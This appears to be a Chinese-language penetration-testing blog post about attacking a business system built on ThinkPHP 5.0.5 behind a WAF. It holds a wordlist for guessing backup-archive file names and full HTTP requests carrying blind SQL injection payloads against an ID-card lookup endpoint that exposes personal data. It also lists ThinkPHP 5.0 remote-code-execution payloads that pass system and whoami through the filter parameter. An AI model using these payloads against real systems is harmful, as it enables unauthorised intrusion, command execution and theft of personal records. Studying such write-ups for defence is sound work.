Thinkphp5.0.5
存在WAF,貌似是某武盾
某费业务系统
在得到目标域名时,结合目公司名称关键字,还有域名的关键字,试着与敏感的备份文件简单组合一下,得到简单的敏感文件字典,字典大致格式为,进行简单的目录扫描,手动去测试逻辑部分,不一会儿目录扫描结果得到业务系统的备份文件,名称为: 关键字+backup.tar.gz
:
关键字+buckup.zip
关键字+buckup.rar
关键字+buckup.zip.tar
关键字+buckup.tar.gz
www+关键字.zip
www+关键字.rar
www+关键字.zip.tar
www+关键字.tar.gz
关键字.zip
关键字.rar
可以随意组合即可,也可以看一下参数命名方式,猜测管理员的命名习惯.....
系统是由ThinkPHP5.0.5进行二次开发而搭建的,因为以前只是简单看过ThinkPHP代码,并不了解Thinkphp,google了一下,对应目录结构,看一下代码:
身份证号处:
对输入没有任何限制,只是前端限制了输入长度,抓包后,随便传个id,就得到个人数据
MySQL
,ThinkPHP-dubug
也没有开启,简单构造盲注证明一下危害即可:POST /index/index/p_card.html HTTP/1.1
Content-Length: 59
Accept: application/json, text/javascript, */*; q=0.01
DNT: 1
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_13_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/99.0.3538.77 Safari/537.36
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9,zh-TW;q=0.8,en-US;q=0.7,en;q=0.6
Connection: close
card=1")/(case when length(user())=0 then 1 else 0 end)+--+
POST /index/index/p_card.html HTTP/1.1
Content-Length: 71
Accept: application/json, text/javascript, */*; q=0.01
DNT: 1
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_13_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/99.0.3538.77 Safari/537.36
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9,zh-TW;q=0.8,en-US;q=0.7,en;q=0.6
Connection: close
card=3")/(case when substr(user(),1,1)like binary 'a' then 1 else 0 end)+--+
注个用户名证明下就可以了….
看了其他代码之后都是一样的风格,注入有很多处….
大同小异,都是直接拼接而且没有任何过滤
ThinkPHP老漏洞,因为目标有WAF自己的被动扫描也没效果,把代码过了一下,发现还是存在,本地搭起来可以复现,具体分析过程可以看y4er大佬博客
,我自己跟了一下,结果如下 :
**Paylaod: **
POST?s=index/index
s=whoami&_method=__construct&method=POST&filter[]=system
aaaa=whoami&_method=__construct&method=GET&filter[]=system
_method=__construct&method=GET&filter[]=system&get[]=whoami
get[]=whaomi&_method=__construct&method=get&filter=system
本地验证成功,WAF没绕过去,自己测试了一下发现WAF拦截的是filter
关键字,没其他想法了,卒….
前台功能点少,只有几个查询,没啥shell的点….
太菜了… 总结一下所有SQL摸鱼完事…
https://www.kancloud.cn/manual/thinkphp5/118008
https://y4er.com/post/thinkphp5-rce/